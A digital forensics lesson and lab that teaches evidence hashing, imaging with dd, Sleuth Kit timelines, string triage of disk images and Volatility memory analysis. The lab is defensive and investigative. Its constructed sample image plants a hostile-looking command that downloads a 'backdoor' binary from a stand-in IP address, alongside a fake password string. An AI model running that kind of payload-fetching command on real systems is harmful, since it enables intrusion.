Digital Forensics
Objectives: By the end of this topic, you will be able to…
- Properly preserve digital evidence
- Use forensic tools in Kali to analyze disks or files
- Interpret relevant information from a forensic image
- Document findings clearly and in a structured manner
Introduction to digital forensic analysis
Digital forensics is a cybersecurity discipline that identifies, preserves, analyzes, and presents digital evidence with legal validity. It is applied in cases of security incidents, fraud, intrusions, or legal investigations.
The goal of forensic analysis is not only to understand what happened, but also to preserve evidence for potential judicial use.
Evidence preservation
Before analyzing any compromised system, it is essential to preserve the integrity of the evidence:
- Forensic images (bit-for-bit) of the disk or device, using dd, dcfldd, or Guymager
- Hash calculation (MD5, SHA-1, SHA-256) before and after acquisition to verify that no alteration occurred
- Use of read-only media to avoid modifying the original
- Detailed logging of every action performed (chain of custody)
Types of digital evidence
| Source | Examples |
|---|---|
| Files | Deleted documents, modified or malicious files |
| System logs | Event logs (Windows Event Logs, syslog) |
| Metadata | Creation/modification dates, author, location |
| Network/application logs | Access records, errors, connections |
| User artifacts | Browsing history, recent files, executed commands |
| RAM memory | Active processes, passwords, connections |
Forensic image analysis
Analysis is performed on an exact copy (image) of the original device:
- Full disk / partition: filesystem analysis (NTFS, ext4, FAT), recovery of deleted files, search for suspicious patterns
- RAM memory dump: identify processes, keys, connections, and volatile artifacts
- Removable devices: USB drives, SD cards that may have been used to exfiltrate data
Analysis tools
| Tool | Use |
|---|---|
| Autopsy / Sleuth Kit | Structured examination of forensic images |
| Bulk Extractor | Pattern extraction (emails, URLs, keys) |
| Binwalk / Foremost / Scalpel | File recovery and binary data analysis |
| Volatility / Rekall | RAM memory analysis |
| ExifTool | Metadata analysis |
Forensic tools in Kali Linux
Kali includes tools for performing forensic tasks without altering the evidence:
- dcfldd / dd: forensic imaging
- hashdeep / sha256sum: integrity calculation and verification
- autopsy / sleuthkit: structured analysis suite
- foremost / scalpel: deleted file recovery
- volatility: RAM memory analysis
- strings: readable text extraction
Kali can be booted in forensic mode (from USB), which avoids automatically mounting disks to prevent evidence alteration.
Hands-on lab
Requirements: Kali Linux, forensic image disco.dd (provided), (optional) memory image memoria.raw
Part 1: Evidence preservation
- Calculate the hash of the original image:

  ```
  sha256sum disco.dd
  ```

- Create a working copy, hashing it as it is written:

  ```
  dcfldd if=disco.dd of=copia.dd hash=sha256 hashlog=hashes.txt
  ```

- Confirm integrity by comparing the hash of copia.dd (in hashes.txt) with the hash of the original; the two must be identical
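The Part 1 procedure as one script, added here as an example that is not part of the lab handout. It uses dd and sha256sum instead of dcfldd so it runs on any Linux with coreutils, hashes the image before and after the copy, and appends every action to a chain-of-custody log. The file names (disco.dd, copia.dd, custody.log) and the 64 KiB random sample image it copies are constructed for the demonstration.

```shell
#!/bin/sh
# Added example (not from the lab handout): Part 1 with plain dd + sha256sum.
# On Kali, dcfldd hash=sha256 hashlog=... does the copy and the hash in one
# step; this version uses only POSIX sh and coreutils. File names are constructed.

# Print the bare SHA-256 hex digest of a file.
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{print $1}'
    else
        shasum -a 256 "$1" | awk '{print $1}'   # BSD/macOS fallback
    fi
}

# Append one timestamped, operator-attributed line to the custody log.
# usage: log_action LOGFILE "free text"
log_action() {
    log="$1"; shift
    printf '%s | %s | %s\n' "$(date -u +%Y-%m-%dT%H:%M:%SZ)" "${USER:-unknown}" "$*" >> "$log"
}

# preserve_image SRC DST LOG
# Hash the original, copy it bit-for-bit, hash the copy, and compare.
# Returns 0 when the digests match, 1 otherwise; every step is logged.
preserve_image() {
    src="$1"; dst="$2"; log="$3"
    h_orig=$(sha256_of "$src")
    log_action "$log" "sha256 original $src = $h_orig"
    # conv=noerror,sync keeps reading past unreadable sectors and zero-fills
    # them. sync pads every short read up to bs, so bs must divide the device
    # size (512 or 4096 for disks); a larger bs would zero-pad the last block
    # and the copy's hash could never match the original.
    dd if="$src" of="$dst" bs=512 conv=noerror,sync 2>/dev/null || return 1
    log_action "$log" "dd if=$src of=$dst bs=512 conv=noerror,sync"
    h_copy=$(sha256_of "$dst")
    log_action "$log" "sha256 copy $dst = $h_copy"
    if [ "$h_orig" = "$h_copy" ]; then
        log_action "$log" "VERIFIED: copy digest matches original"
        return 0
    fi
    log_action "$log" "MISMATCH: copy differs from original, do not analyze it"
    return 1
}

# Demonstration on a constructed 64 KiB "image" (a multiple of 512 bytes).
demo_dir=$(mktemp -d)
head -c 65536 /dev/urandom > "$demo_dir/disco.dd"
if preserve_image "$demo_dir/disco.dd" "$demo_dir/copia.dd" "$demo_dir/custody.log"; then
    echo "copy verified; chain-of-custody log:"
    cat "$demo_dir/custody.log"
fi
```

When the source is an existing image file rather than a device (as in this lab), there are no bad sectors to skip, so a plain `dd if=disco.dd of=copia.dd bs=4M` without `conv=noerror,sync` is both faster and safe; the small block size and `sync` only matter when reading a physical disk.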
Part 2: File extraction and analysis
Extracting deleted files:
```
foremost -i copia.dd -o output/
```

Examine the output/ folder: documents, images, suspicious executables.
Filesystem analysis with Sleuth Kit:
```
fls -r -m / copia.dd > structure.txt
icat copia.dd <inode> > recovered_file
```

Use fls and istat to view hidden files, access and modification times, and activity logs.
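The structure.txt that `fls -r -m / copia.dd` writes is a Sleuth Kit bodyfile, one line per entry with the four timestamps packed into fields 8 to 11 (MD5|name|inode|mode|UID|GID|size|atime|mtime|ctime|crtime). Sleuth Kit's mactime turns that into a timeline; the functions below do the same with awk, plus a filter for a suspected incident window and a list of the entries fls flagged as deleted. This is an added example, not part of the lab handout, and the three-line sample bodyfile it works on is constructed, not taken from any real image.

```shell
#!/bin/sh
# Added example (not from the lab handout): build an event timeline from the
# bodyfile produced by `fls -r -m / copia.dd`, as Sleuth Kit's mactime does.
# Bodyfile field order (TSK 3.x):
#   MD5|name|inode|mode|UID|GID|size|atime|mtime|ctime|crtime
# The sample bodyfile below is constructed.

# timeline_from_bodyfile FILE
# One output line per timestamp: epoch|flag|size|inode|name, sorted by time.
# Flags follow mactime: m=modified a=accessed c=metadata changed b=born (created).
timeline_from_bodyfile() {
    awk -F'|' '
        NF >= 11 && $1 !~ /^#/ {
            # a zero timestamp means "not recorded" on this filesystem; skip it
            if ($8 > 0)  print $8  "|a|" $7 "|" $3 "|" $2
            if ($9 > 0)  print $9  "|m|" $7 "|" $3 "|" $2
            if ($10 > 0) print $10 "|c|" $7 "|" $3 "|" $2
            if ($11 > 0) print $11 "|b|" $7 "|" $3 "|" $2
        }' "$1" | sort -t'|' -k1,1n -k2,2
}

# events_between FILE START END
# Restrict the timeline to a suspected incident window (epoch seconds, inclusive).
events_between() {
    timeline_from_bodyfile "$1" | awk -F'|' -v s="$2" -v e="$3" '$1 >= s && $1 <= e'
}

# deleted_entries FILE
# fls appends " (deleted)" to the names of unallocated entries it can still read;
# these are the candidates for `icat copia.dd <inode>` recovery.
deleted_entries() {
    awk -F'|' '$2 ~ /\(deleted\)$/ {print $3 "|" $2}' "$1"
}

# Constructed sample: a shell history, a dropped binary and a deleted auth log.
make_sample_bodyfile() {
    cat > "$1" <<'EOF'
0|/home/user/.bash_history|12345|r/rrw-------|1000|1000|512|1700000300|1700000200|1700000200|1700000000
0|/tmp/.x/backdoor|20001|r/rrwxr-xr-x|0|0|73728|1700000150|1700000100|1700000100|1700000100
0|/var/log/auth.log (deleted)|30007|r/rrw-r-----|0|4|0|1700000250|1700000250|1700000260|1699990000
EOF
}

# Demonstration
sample=$(mktemp)
make_sample_bodyfile "$sample"
echo "--- full timeline ---";          timeline_from_bodyfile "$sample"
echo "--- 1700000100..1700000260 ---"; events_between "$sample" 1700000100 1700000260
echo "--- deleted entries ---";        deleted_entries "$sample"
```

Reading the sample timeline top to bottom shows the kind of sequence the incident hypothesis in the submission should rest on: the binary under /tmp/.x is created, then accessed (executed), and shortly afterwards the auth log's metadata changes and the entry ends up deleted. On a real image, feed structure.txt to these functions (or to `mactime -b structure.txt -d`) and narrow the window with events_between.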
Text and metadata inspection:
```
strings copia.dd | less
```

Search for credentials, messages, internal paths.
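Paging through `strings copia.dd | less` works for a first look, but the artifact classes the lab asks for (credentials, messages, internal paths) can be pulled out directly with pattern matching, in the spirit of what Bulk Extractor does. The functions below are an added example, not part of the lab handout: they run `grep -a` over the raw image (so no strings(1) is needed) and report unique hits per class. The small "image" they run on is constructed inline from zero-filled blocks with a few planted strings; the address 198.51.100.7 is a documentation address, not a real host.

```shell
#!/bin/sh
# Added example (not from the lab handout): pattern triage over a raw image.
# grep -a treats the binary image as text, -o prints only the matching part,
# and sort -u collapses repeats. The sample image is constructed.

# Each extractor prints unique matches, one per line.
extract_emails() {
    grep -a -o -E '[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}' "$1" | sort -u
}
extract_urls() {
    grep -a -o -E 'https?://[A-Za-z0-9._~:/?#@!$&()*+,;=%-]+' "$1" | sort -u
}
# Two or more path components, e.g. /tmp/.x/backdoor. Expect some noise
# (URL paths also match); the analyst filters by hand.
extract_unix_paths() {
    grep -a -o -E '(/[A-Za-z0-9._-]+){2,}' "$1" | sort -u
}
# key=value fragments whose key looks like a secret; the value runs until
# whitespace or a control byte (the NUL that usually terminates such strings).
extract_credentials() {
    grep -a -o -E -i '(password|passwd|pwd|token)=[^[:space:][:cntrl:]]+' "$1" | sort -u
}

# triage_report IMG: one line per artifact class with its number of unique hits.
triage_report() {
    printf 'emails %s\n'      "$(extract_emails "$1" | wc -l | tr -d ' ')"
    printf 'urls %s\n'        "$(extract_urls "$1" | wc -l | tr -d ' ')"
    printf 'paths %s\n'       "$(extract_unix_paths "$1" | wc -l | tr -d ' ')"
    printf 'credentials %s\n' "$(extract_credentials "$1" | wc -l | tr -d ' ')"
}

# Constructed sample image: zero-filled filler with a few planted strings,
# each NUL-terminated as they would be inside a file or slack space.
make_sample_image() {
    {
        head -c 1024 /dev/zero
        printf 'From: admin@corp.example\000'
        head -c 512 /dev/zero
        printf 'curl -o /tmp/.x/backdoor http://198.51.100.7/dl/x.elf\000'
        head -c 256 /dev/zero
        printf 'db_password=Winter2024!\000'
        head -c 512 /dev/zero
        printf 'Re: invoice from billing@corp.example about /srv/share/finance/q3.xlsx\000'
        head -c 1024 /dev/zero
    } > "$1"
}

# Demonstration
sample=$(mktemp)
make_sample_image "$sample"
triage_report "$sample"
echo "--- credentials ---"; extract_credentials "$sample"
echo "--- paths ---";       extract_unix_paths "$sample"
```

Run the same extractors against copia.dd, never against disco.dd, and record which class of string led to each finding so it can be cited in the incident hypothesis.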
Part 3 (Optional): Analysis with Autopsy
- Load the image copia.dd
- Navigate the event timeline
- Search for suspicious activity (recent execution, created or deleted files)
- Use metadata analysis and automatic indexing features
Part 4 (Optional/Advanced): Memory analysis
If memoria.raw is available:
```
volatility -f memoria.raw imageinfo
volatility -f memoria.raw --profile=Win7SP1x64 pslist
volatility -f memoria.raw --profile=Win7SP1x64 netscan
volatility -f memoria.raw --profile=Win7SP1x64 malfind
```

Identify hidden processes, extract DLLs, commands used, open connections.
Submission
- Hashes and verification of the original image
- List and analysis of recovered files
- Key fragments (strings, metadata, suspicious names)
- Screenshots and key findings
- Incident hypothesis (1-2 paragraphs): what happened, who may have done it, what evidence supports the hypothesis
Key concepts
| Term | Definition |
|---|---|
| Digital forensics | Discipline that identifies, preserves, analyzes, and presents digital evidence |
| Forensic image | Bit-for-bit copy of a device for analysis without altering the original |
| Chain of custody | Documented record of actions performed on digital evidence |
| Autopsy | Graphical forensic analysis tool based on Sleuth Kit |
| Volatility | RAM forensic analysis framework |
| Hash | Function for verifying file integrity of evidence |
Test yourself
- Preservation: Why is it critical to calculate the hash of a forensic image before and after copying? What would happen if the hashes do not match?
- Analysis: You receive a disk image of a compromised system. Describe your analysis process step by step, from preservation to the incident hypothesis.
- Memory: What information can you obtain from RAM analysis that is not available on the hard drive? Why is it important to capture RAM before shutting down the system?